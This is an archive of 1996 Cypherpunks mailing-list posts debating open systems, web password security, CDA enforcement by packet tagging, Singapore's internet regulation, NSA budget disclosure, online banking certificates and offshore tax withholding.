from the Economist "THE INCREDIBLE SHRINKING COMPANY" 15 December 1990 

(http://www.ios.com/~lroth/CLIPS/Bussiz.html)

"Part of the answer [as to why firms are shrinking] may lie in the fact
that, loth though they are to admit it, top people's capacity to deal with
information is limited. There is no technical reason why a Wall Street
investment house should not line the walls of the managing director's office
with screens, showing second-by-second price movements for thousands of
securities. But there is not much a single person could do with all that
information. So the best way to take advantage of increases in the amount of
information coming into the firm is to push decision-making down the
corporate hierarchy, to where the flow is manageable by a single mind: on
Wall Street, a trader."  [And if you don't, the market will.]

Hierarchies my be able to produce a lot of a limited range of products:
megatons of sandy concrete and dead bodies like Communism, or globe-spanning
private networks like X.25, or millions of pounds of Armonk Iron like IBM,
but they can't produce as broad or satisfactory or an output or in the end
as *large* an output as open systems can.   

The Net or the Market can produce an incredible range of products that no
*one* would ever think of (save for the *one* who did).  And since people
are more likely to find things that they want in the whole range of
"products," open systems encourage more activity and hence more "wealth."

Additionally, the absence of the need to ask permission from Gosplan, or the
Sysadmin, or some marketing committee obviously makes it possible to do more
faster.  You not only save the begging and committee decision time, you can
do things that others might think bad or peculiar.  No need to convince
strangers about the value of your idea prior to trying it out.  You get to
just do it.

Now none of these differences between open systems and hierarchies meant
much when the bulk of the world's population had to spend all of its time
growing food to survive, but now...

Choice exists and choices will be made.  Hierarchies will try and resist the
spread of open systems but they will not be successful and their failures
will come faster and be much more obvious as time goes on.  If one
organization resists "successfully," people and money will drain away from
it to other organizations where they are allowed a fuller range of choice.
The success of open systems will help the spread of those systems into the
surviving bastions of hierarchy.  

That's why I'm the Pangloss of Cypherpunks "everything's for the best in the
best of all possible worlds".    

I know that this is all Kindergarten stuff but sometimes simple things are
hard to see.  

People today are offered a choice between two ways of doing things:  1) You
get to do what you want and (by the way) have a vast wealth of "things" to
own/use. or 2) You have to do what other people tell you and (unfortunately)
make do with less of everything including choice, money, and "toys."

I wonder what choice people will make?

DCF








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K00l Secrets <secret@secret.alias.net>
Date: Wed, 10 Apr 1996 07:26:49 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199604091645.LAA19569@paulsdesk.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


> Shaving probably will not be a problem, but holding your head at a
> slightly different angle...  will screw up the system totally,
> unless the system has radically improved since the last time I read
> up on it.

Well, the systems I have seen are quite good at finding people's eyes.
Scaling (for distance), and rotation (for the angle of your head)
therefore don't really confuse the system once it has your eyes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 10 Apr 1996 06:52:19 +0800
To: blane@aa.net (Brian C. Lane)
Subject: Re: WWW User authentication
In-Reply-To: <31676b78.52447450@mail.aa.net>
Message-ID: <199604091558.LAA22026@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian C. Lane writes:

>   I just finished writing a cgi script to allow users to change their login
> passwords via a webpage. I currently have the webpage being authenticated
> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
> many browsers actually support it?

AFAIK, none.  I don't see how this would be helpful anyway.  If you 
MD5 the password, I won't be able to snoop the password off the wire,
but I can simply snoop the MD5 hash off the wire instead and since 
that's what your authentication check must now be against, what does
this buy you?


>   When the user changes their password, the form sends their name, old
> password, and new password with it, in the clear. This is no worse than
> changing your password across a telnet connection, but I'd like it to be
> more secure, but useable by a large number of browsers.
> 
>   Any advice?

Well, if you use SSL, it's useable by a "large number of browsers" since
Netscape has such a large share of the browser market.  And then all of
the things you're doing w.r.t. authentication are hidden, at least from
casual eavesdroppers and others too if you use more than the 40-bit option.
There's really no other choice to reach a large number of browsers.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Apr 1996 06:58:54 +0800
To: Jüri Kaljundi <jk@digit.ee>
Subject: Re: Bank transactions on Internet
In-Reply-To: <Pine.GSO.3.92.960409173030.9284E-100000@happyman>
Message-ID: <199604091603.MAA02105@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> This AT&T Orca or FPGA chip or whatever the name is, is it freely
> available device

If you mean "do they sell them commercially" the answer is yes.

> What I am asking is if this cracking device would be
> available to anyone with 400$ and some computer knowledge?

You would have to be smart but yes.

There are many such devices, by the way.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Apr 1996 07:00:54 +0800
To: "JR Weaver" <weaver@harry.bwi.wec.com>
Subject: Re: NSA Budget
In-Reply-To: <9604091030.ZM2472@harry.bwi.wec.com>
Message-ID: <199604091605.MAA02111@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"JR Weaver" writes:
> http://www.fas.org/pub/gen/fas/irp/commission/budget.htm
> 
> This page reveals the FY96 NSA budget at $3.6 billion.

It doesn't give any details, though. The general size of the NSA
budget was known for a long time based on inference -- see "The Puzze
Palace".

In any case, they are not now making a habit of releasing budget
numbers, but you can find out how much they in general
spend. Certainly the original poster's request for detailed quarterly
reports isn't going to be met...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Apr 1996 06:41:07 +0800
To: cypherpunks@toad.com
Subject: WRY_cfp
Message-ID: <199604091611.MAA01539@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-09-96 FT reports on CFP, with wry comments about
   eavesdropping on cpunkish issues and notables: encryption
   blanc et noir; sci-fi scenarios; Garfinkel and Chaum on e-
   money; CDA; cyber-terrorism, -porno, -child abuse, and 
   -crime; suits cold-sweating secrets.

   For the sweaters, a related sheepswooly vaunts Open
   Market's "industrial strength" OM-products for secure Net
   biz.


   WRY_cfp












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 10 Apr 1996 06:43:03 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Singapore & the net
Message-ID: <Pine.SUN.3.91.960409121152.4778I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Reuters reports Singapore has issued new regulations relating to the 
Internet today.  Anyone have a pointer or details?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 10 Apr 1996 12:08:38 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <316A6175.74DA@vail.tivoli.com>
Message-ID: <199604091738.NAA00421@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>Declan B. McCullagh wrote:
>> The attached paper by Dr. Reed is worth reading -- I haven't seen this
>> argument raised before. One portion that I found fascinating was:
>> 
>>   "It is quite silly to imagine that the Ascend router at the ISP can
>>   figure out if it is me or my child generating each packet."
>>
>> But that's exactly what the defenders of the CDA are claiming! Here's
>> some background that might be interesting:
>
>I sent a letter to the Economist last year pointing this out after reading
>an article containing the offhand statement, "... and of course it is
>entirely feasible to control Internet content" (or something like that).
>I don't have those magic two letters at the front of my name though.  It
>seems so utterly obvious.  When you connect to an ISP via PPP or SLIP,
>all the ISP is doing is routing packets. 

Wait a second.  I don't know that it's really as impossible as you
think.  Given the CDA advocates' hypothesis that anonymity is a Bad
Thing (tm), it's reasonable for them to assume that the ISP can arrange
to have a policy requiring that it know who's making the SLIP/PPP
connection.  It's not too hard to have *every* packet generated by a
given connection flagged with an IP option indicating "adult" or
"minor".  It's not that different from the "Security Classification"
option that's already in the IP spec.  Incoming connections to a
server are then already marked, leaving no excuses for servers that
deliver contraband to such connections.

The only technical problem comes when the SLIP/PPP link serves a mixed
group of users, as described in Dr Reed's paper.  In this case, I'd
think the ISP would be responsible for verifying that the person
requesting the "adult-flagged" service is really an adult, and *that*
person is responsible for what happens to the data after it's
delivered.  It'd be no different from the case where an adult goes into
an adult bookstore, buys contraband, and gives it to a minor.  The
bookstore isn't accountable.

The argument that this is technically infeasible is hooey.  This
doesn't address the issue of whether it's a Good Thing (tm), though.
Dr Reed argues that such end-to-end policies are best left out of the
network layer, but admits that adding support to the network layer may
reduce the implementation cost.  It's still expensive, though, since
all providers of indecent material and all participating ISPs have to
upgrade their software.

What possibilities does it leave for anonymity?  ISPs that don't
participate in the packet flagging might permit anonymous connections,
since it's entirely up to the information provider whether to deliver
the requested data.  Adult content providers who deliver contraband to
unflagged connections are asking for trouble.

>> Chris Hansen from the ACLU told me last Friday: "Olsen is going to push
>> this tagging idea that the government has, that you can imbed in your
>> tag -- in your address -- an adult or minor tag. They're going to
>> suggest that the market will come into existence that will make that
>> tagging relevant."
>
>Uhh...  what about the rather obvious problem that some of these new
>fangled computers can support an enormous spread of information?  My
>web site at io.com has no offensive materials (though I recently rated
>it as basically "Satan's Headquarters" via SurfWatch), but other stuff
>at io.com may well be offensive.  Packets routed out through io's
>interface will of course all come from the same address.

Given your position, io.com is only accessible to adults in the world
of the CDA advocates.  Just upgrade your IP software to refuse
connections from minors.

My response to the censors' position that too much stuff on the 'net is
unsuitable for children is:  "Keep 'em off the net, then."  I'd rather
have internet access by minors generally forbidden than have
censorship.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 10 Apr 1996 10:11:16 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <199604091738.NAA00421@universe.digex.net>
Message-ID: <316AA1FC.6ED1@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner wrote:
> Given your position, io.com is only accessible to adults in the world
> of the CDA advocates.  Just upgrade your IP software to refuse
> connections from minors.

It's not "my" IP software.  I pay io for an account.  What you're saying
is that every ISP would have to decide whether to be completely G-rated
or else open to anybody.

Sigh.  That's probably what the CDA crowd wants.  It's hard not to become
consumed by hatred.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Wed, 10 Apr 1996 07:56:53 +0800
To: Jon Matonis <jon@verisign.com>
Subject: Re: Bank transactions on Internet
Message-ID: <9604091701.AA29911@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 04:31 PM 4/8/96 -0700, you wrote:
>I agree with Jim at SFNB that the encryption made possible by VeriSign
>server certificates is an integral part of remote banking on the Web.
>However, I would encourage Security First and other banks looking at the Web
>to focus increased attention on client certificates AND to migrate away from
>their dependence on user passwords.

        I brought this up with SFNB a month or so ago (when I opened my
account) and the word then was that client side certificates would be
avaible within a month or so, my time guestimate (based on what they were
saying) was half-a-year.

>Admittedly, client certificate
>functionality has not yet been available but it will probably be standard by
>mid-1996.

        Let's hope so, I am not keeping significant funds in that account
until I have a certificate.

>Yes---it is true that security is never absolute.

        I hope Eric Young does attempt to crack a 40-bit SFNB session as he
mentioned on cpx today.

>As Michael Karlin of SFNB noted and subsequently corrected, Netscape caches
>passwords.

        I suspected this, and was further exposed because of a common
problem with using Netscape and the like from student accounts (with a big
10M quota), say on MIT's athena, where I like my disk cache to reside in the
workstations /tmp . I wipe(d) it whenever I log out, but I'm sure others
sprinkled their passwords in a million "public" cache's before SFNB stuck
the tag no-cache tag in. 

OBJava: do java applets have access to the cache, would it be possible to
write one of the little nasties that keep an eye on the cache?

>Additionally, people tend to use a single password for 10 or more of their
>relationships and one compromise, compromises all.

        Indeed! How many people use their easily crack "ftp:/etc/passwds"
password for SFNB?

_______________________
Regards,            The best way to have a good 
                    idea is to have lots of ideas. - Linus Pauling
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Apr 1996 13:14:00 +0800
To: Asgaard <cypherpunks@toad.com
Subject: [noise] Re: They're running scared.
Message-ID: <2.2.32.19960409202520.0093ba00@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 PM 4/9/96 +0200, Asgaard wrote:
>On Mon, 8 Apr 1996, Michael C. Peponis wrote:
>
>> Personally, I love national insecurity such as terrorist attacks and 
>> random bombings, wish there were more of them by more people.
>
>A big problem with random bombings is that one self can become part
>of the random targets.

The question is if they are truly random bombings and how do we determine if
they are.  And if they are truly random, how can they be adapted as a source
for a good cryptosystem?  ("We are sorry for the delays in the transmision.
We had to let a few more bombs go off.")

How many bits of entropy do you get from an explosion anyways?  (Depends on
how close you are to the blast...) ];>


---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 10 Apr 1996 08:44:05 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: the cost of untracability?
In-Reply-To: <2.2.32.19960408231626.00c90cc8@panix.com>
Message-ID: <Pine.SUN.3.91.960409132018.17470A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, Duncan Frissell wrote:

> At 03:36 PM 4/8/96 -0400, Black Unicorn wrote:
> 
> >In addition, to prevent funds from being removed to non-resident aliens 
> >or foreign entities where tax enforcement and collection is difficult, 
> >there is a 30% withholding requirement in the event the payee is not a 
> >U.S. citizen or resident (for tax purposes).
> 
> The withholding tax applies only if the payee is not a resident of a
> jurisdiction with a tax treaty with the US.

Agreed, but with qualification.

Most, but not all, tax treaties include provisions limiting or 
eliminating the foreign soruce withholding tax.  Note, however, that these 
are typically only treaties that also provide for information sharing and 
enforcement of foreign tax judgments.  Offshore jurisdictions which do 
not permit information sharing, jurisdictions without mutual legal 
assistance agreements, and offshore jurisdictions which do not 
have treaties at all with the United States (i.e. jurisdictions where one 
would want to actually hold assets and feel them secure) are going to 
expose the payee to this liability.

It's a trade off unless one finds a jurisdiction without such a treaty 
which is  at the same time unwilling to cooperate and withhold the 
taxes.  Even in the event this jurisdiction is used, if the payor has 
assets in the United States they will be attachable to satisfy the 
payee's 30% withholding tax.

In my view it is best to opt for banking secrecy jurisdictions and 
financial entities that hold no significant assets in the United States.

  Net banking will further muddy
> the waters on this because of the difficulty of telling the residency of
> customers particularly in the case of accounts transferred to third parties
> for profit -- a worthwhile future business activity.

Agreed.

> DCF

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 10 Apr 1996 09:49:43 +0800
To: zalchgar <zalchgar@juno.com>
Subject: Re: NSA Budget
In-Reply-To: <19960408.181433.15302.0.zalchgar@juno.com>
Message-ID: <Pine.SUN.3.91.960409133756.17470D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Apr 1996, zalchgar wrote:

> Is there a public release of the NSA's annual Budget.

No.

> If so is there a quarterly release.

No.

One can, however, get an idea of the size because of the various screwups 
the budget committee makes.  For example.  This year a bar chart (to scale)
representing the various agencies was released without exact numbers 
attached.  The idea was to give the policy makers an idea about what the 
relation between the intelligence agencies was in terms of budget without 
giving away the exact figure.

Of course the office of intelligence policy and review released a report 
giving the size of the entire intelligence budget.  I believe the 
Washington Post had some reporter who pulled out a ruler and measured all 
the bars, then published the figures that went to each agency based on 
the total figure released.

A quick search of the papers (last month?) will probably give you the 
figures.

 > -Erinn

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Apr 1996 12:59:03 +0800
To: Dave Del Torto <cypherpunks@toad.com>
Subject: Re: [NOISE] Federal Bureau of Indigestion
Message-ID: <m0u6lsa-0008zUC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 AM 4/9/96 -0700, Dave Del Torto wrote:
>[forwards mercifully elided]
>
>FBI agents conducted a raid of a psychiatric hospital in San Diego that was
>under investigation for medical insurance fraud. After hours of reviewing
>thousands of medical records, the dozens of agents had worked up quite an
>appetite. The agent in charge of the investigation called a nearby pizza
>parlor with delivery service to order a quick dinner for his colleagues.

Funny stuff deleted.

>PM:	   And everyone at the psychiatric hospital is an FBI agent?
>Agent:	   That's right. We've been here all day and we're starving.
>PM:	   How are you going to pay for all of this?
>Agent:	   I have my checkbook right here.
>PM:	   And you're _all_ FBI agents?
>Agent:	   That's right. Everyone here is an FBI agent. Can you remember
>	   to bring the pizzas and sodas to the service entrance in the rear?
>	   We have the front doors locked.
>Pizza Guy: I don't _think_ so...  >click<

I'm waiting for Unicorn to claim that the next phone call to the pizza shop 
was from a judge, who was placing a subpoena on the next 19 pizzas that shop 
produced, and ordered them delivered to the hospital for psychiatric 
evaluation.  B^)

Jim Bell
jimbell@pacifier.com
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 10 Apr 1996 15:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: Open Systems, Closed Systems, & Killer Apps
Message-ID: <2.2.32.19960409182717.009e146c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 4/9/96 -0400, Duncan Frissell wrote:

>I should have known this before since it is implicit in my favorite article
>from the Economist "THE INCREDIBLE SHRINKING COMPANY" 15 December 1990 
>
>(http://www.ios.com/~lroth/CLIPS/Bussiz.html)

Try http://www.ios.com/~lroth/clips/bussiz.html instead.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 10 Apr 1996 16:38:08 +0800
To: cypherpunks@toad.com
Subject: Background on Singapore net-censorship
Message-ID: <Pine.3.89.9604091414.A1621-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Michael, here's the message I was forwarded. Thanks to Joon-Nie for 
corrections to the articles I included, mainly from the NYT/WP and the 
Reuters/AP wire.

-Declan


---------- Forwarded message ----------
Date: Wed, 10 Apr 96 03:57:22 EDT
From: Lau Joon-Nie <joonlau@pacific.net.sg>
Subject: [Fwd: Re: International Net-Censorship Efforts Update]


Spotted this in a newsgroup, but I would caution readers against wholesale
reliance on its contents without some official verification as not all of
it may be entirely correct (at least the Singapore bits weren't - which I
have amended). 

rgds,
joon-nie

=========BEGIN FORWARDED MESSAGE=========

In soc.culture.singapore, "Declan B. McCullagh" <declan+@CMU.EDU>
wrote:

>I've just doubled the number of international net-censorship efforts
>that I track on my web page: <http://www.cs.cmu.edu/~declan/zambia/>.

>Included are new updates reporting on Germany, France, Australia,
>Singapore, Canada, and China, among others. Please send me reports on
>countries I've missed!

>-Declan

>--------------------------------------------------------------------------

>   
>                    OTHER INTERNATIONAL NET-CENSOR EFFORTS 

>                              By Declan McCullagh
>                                declan@well.com
>                     http://www.cs.cmu.edu/~declan/zambia/   
>   

>     France, China, Germany, Singapore, Jordan, the U.S., and many other
>     countries are moving towards tighter control of the Internet. France
>     and Germany want to see an international agreement of information
>     controls emerge. Recently China required all of its estimated 40,000
>     Internet users to register at the local police station. This
>     international crackdown marks a turning point in the development of
>     the Net.

>     
>  Germany
>  
>     Germany cuts off access to holocaust revisionist web site (1/96)
>     German Internet update, new laws planned (3/29/96)
>     Los Angeles Times on German vs. U.S. netcensorship (3/13/96)
>     German minister predicts collapse of governments (3/12/96)
>     Germany's CompuServe net-censorship (12/31/95)
>     
>  France
>  
>     French government bans controversial book (1/96)
>     French Jewish students sue ISPs for revisionist materials (3/14/96)
>     French Jewish students sue ISPs for revisionist materials (3/15/96)
>     France calls for "global Internet rules" (2/3/96)
>     
>  Europe
>  
>     Swiss statement on voice over Internet (3/16/96)
>     Sweden proposes CDA-type law to control Internet (4/3/96)
>     Italian net-censorship necessary, says Simon Wiesenthal Ctr (1/11/96)
>     Turkey cracks down on Internet (2/18/96)
>     Belgium bans non-escrowed encryption (1/10/96)
>     
>  Asia and Pacific Rim
>  
>     Singapore leader condemns Net (3/7/96)
       ^^^^^^^^^^^^^^^^^^^^^^^^
This phrase is at best vague. My guess is that he's referring to the news conference on 5 Mar 96 given by S'pore's Information and the Arts Minister Brig-Gen George Yeo where it was announced that S'pore would be implementing a regulatory framework to inter alia, block off objectionable sites, deem all content providers (except those "acting in personal capacity" - yet to be defined) as licensed, and requiring certain types of content providers (those publishing religious, political or racial content/discussions on websites, and certain online newspapers, in particular those already selling hardcopy versions in S'pore) to register themselves with the S'pore Broadcasting Authority.	

BG Yeo did not in any way "condemn" the internet. On the contrary, if my memory serves me correctly, he said S'pore was going full steam ahead with providing people with access eg. through schools, and that there were already an estimated 100,000 internet users in S'pore.

For full text of the news release, see:

http://www.antcrc.utas.edu.au/~kwe_chia/sef/SBA.html

>     Indonesia attacks Net (3/11/96)
>     Malaysia complains about uncensored Net, censors it (3/11/96)

Again, this is not entirely accurate. If I recall correctly, Malaysian Information Minister said some censorship was necessary and agreed with S'pore that ASEAN should work tog to come up with some standards. A day or two later, M'sian Prime Minister Mahathir said something to the effect that censorship was not possible and that education was the key. No active measures by M'sia as far as I'm aware of. Perhaps TM Tan can enlighten us. :)

>     Singapore censors political, religious net.info (3/6/96)

This was in relation to the news conference on 5 Mar 96 mentioned above on the *planned* regulatory framework. Details and legislation have yet to be tabled in Parliament so none of the proposals mentioned in the release have been carried out as yet although S'pore IASPs have, for several months now, been blocking off access to some 40-50 "objectionable sites" (read: pornographic) from a list given to them by the authorities. Framework details are expected within the next 2 months. Meanwhile a S'pore netter has submitted on 30/3/96 a petition supported by 40 signatories to the authorities against inter alia, regulation of political, religious, racial expression of ideas, and suggesting that govt ministries set up PR depts to counter such ideas if need be.
     
>  China
>  
>     China cracks down on Internet, "state security" cited (1/24/96)
>     China's anti-cyberporn efforts (2/4/96)
>     New York Times on China's net.crackdown (2/5/96)
>     China's history of Net-regulation, cyberporn concerns (1/1/96)
>     China requires Internet users to register with police (2/16/96)
>     U.S. State Dept criticizes China's net.censorship (3/8/96)
>     China applauds German net.censorship (1/11/96)
>     
>  Australia
>  
>     Australia considers net.legislation (2/13/96)
>     New South Wales tries net-censorship (4/3/96)
>     Australians upset by German Zundelcensorship (4/7/96)
>     
>  Canada
>  
>     Letter to Canadian minister (3/19/96)
>     Canada needs to regulate Net, says Simon Wiesenthal Ctr (2/20/96)
>     
>  Middle East
>  
>     Persian Gulf States reluctant to move online (4/6/96)
>     Jordan installs Internet screening facility (1/8/96)
>     Saudi Arabian government says no unrestricted Net access (1/10/96)

>--------------------------------------------------------------------------
=========END FORWARDED MESSAGE=========

*---------------------------*

	    Lau Joon-Nie
	joonlau@pacific.net.sg

"Even God has a Geiger-complex"
- Dr Aaron Shut, Chicago Hope -
*---------------------------*







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Wed, 10 Apr 1996 06:32:05 +0800
To: cypherpunks@toad.com
Subject: WWW User authentication
Message-ID: <31676b78.52447450@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



  I just finished writing a cgi script to allow users to change their login
passwords via a webpage. I currently have the webpage being authenticated
with the basic option (uuencoded plaintext). MD5 would be nicer, but how
many browsers actually support it?

  When the user changes their password, the form sends their name, old
password, and new password with it, in the clear. This is no worse than
changing your password across a telnet connection, but I'd like it to be
more secure, but useable by a large number of browsers.

  Any advice?

    Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Apr 1996 17:46:10 +0800
To: Mike McNally <sjb@universe.digex.net>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <2.2.32.19960409221018.0093c1a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 PM 4/9/96 -0500, Mike McNally wrote:
>Scott Brickner wrote:
>> Given your position, io.com is only accessible to adults in the world
>> of the CDA advocates.  Just upgrade your IP software to refuse
>> connections from minors.
>
>It's not "my" IP software.  I pay io for an account.  What you're saying
>is that every ISP would have to decide whether to be completely G-rated
>or else open to anybody.

Then they go on about how every school in the country needs to be connected
to the net...

I am wondering where they got the idea that the net is someplece they want
their children to be.  They don't let them play in distant parks inhabited
by scary old men and drunks, yet they want them to play on the "information
Superhighway".  

The CDA types seem to view the net the same way that they view TV in the
classrooms.  They expect it to be as easy to control as well.  Get them all
staring at the box and they will quiet down and do as they are told.  What
these people do not seem to understand is what is going to happen when their
kids are exposed to the diverse opinions present on the net.  

Forget the porno...  What are the parents who believe in Creationism going
to do when little Johnny runs into a good skeptical site debunking all that
crap?  What are they going to do when the little liberal kids are exposed to
the works of conservitives?  Or Biblical Inerentists kidlets are exposed to
the debunkings of that faith?  Or Dorthy Denning's kids (if she has any) get
exposed to the writings of the subversive known as Tim May?

The CDA proponents want the ideas presented to their kids be controled ones.
The existance of freedom on the net is a threat to that control.  Porno is
used as the (net)scapegoat, but there are far more threatening ideas out
there to that kind of mindset.  They just know that if they tell you their
true goals, then people will not go along with them.

If you want to know their real fears, read the stuff they write for the
"faithful".  It is far more revealing.  ("Remember: It is not a conspiracy
if you can subscribe to their newsletter.")

>Sigh.  That's probably what the CDA crowd wants.  It's hard not to become
>consumed by hatred.

When reading Lovecraft, i always wondered what could be written down that
would drive men mad.  Lovecraft always described it as some cosmic horror.
The cosmic is too far removed for most people to understand.  I have always
thought that instead, it described how the world worked and the driving
motivations behind it, with the firm understanding that there was not a damn
thing you could do to stop it.  The understanding that the world is driven
by the forces of ignorance and stupidity is enough to drive you to the
brink.  The Necronomicon was not written by the Mad Arab, it was written by
Scott Adams.
  
---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Apr 1996 13:36:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u6mlr-0008zkC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 PM 4/8/96 -0400, Black Unicorn wrote:

>> Spooner's quote follows:
>> 
>>   "Doubtless the most miserable of men, under the most oppressive
>> government in the world, if allowed the ballot, would use it, if they
>> could see any chance of thereby meliorating their condition.  But it
>> would not, therefore, be a legitimate inference that the government
>> itself, that crushes them, was one which they had voluntarily set up, or
>> even consented to."
>> 
>> Lysander Spooner
>
>I didn't respond to this part originally because I grew tired of typing
>"Yadda yadda yadda" everytime Mr. Bell lapsed into another
>psycho-political babble session.

And the rest of us are tired of seeing those non-responses!

>What this has to do with Mr. Bell's  position, that citizens as a whole had 
>grown so discontented in the United States that they were prepared to rebell 
>actively in large numbers, is unclear.  In fact the Spooner quote adds 
>more to my position than Mr. Bell's:
>
>"if allowed the ballot, would use it, if they could see any chance of 
>thereby meliorating their condition."  
>
>Seems that even according to Spooner, the citizens of the U.S. aren't 
>hopeless yet.

Aside from the fact that Lysander Spooner has been dead for a LONG time, and 
thus has no opinion concerning 1996 America, your "logic" is atrocious.  He 
is saying:

"If people think it might help, they might use the ballot."

He is _not_ saying:

"If people use the ballot, it means they think it might help."

Maybe such subtleties of logic are beyond you...


>In fact there is ample evidence that citizens who have come to believe 
>that a sovereign is beyond redemption refuse to participate in the 
>political process any longer.  Iran, Iraq, the former Soviet Union, 
>Turkey, the Baltic States are all examples.

I think that the main reason this observation is hilarious is that one 
frequent complaint from media types is (and has been, for decades) that 
there is a nearly steadily-decreasing voter turnout at the polls in the US.

It is not my intention to make the same foolish logical error that you did.  
I won't claim, absolutely, that failure to participate in an election _must_ 
be evidence that people believe "a sovereign is beyond redemption."  But since you've 
stepped into it, I intend to rub your nose in it as well. To whatever extent 
you believe your last claim, you should be willing to accept the obvious 
conclusion that many of the American public don't believe that the 
government is worth trying to retrieve, and they haven't for years.  Which 
means that, as usual, you've 
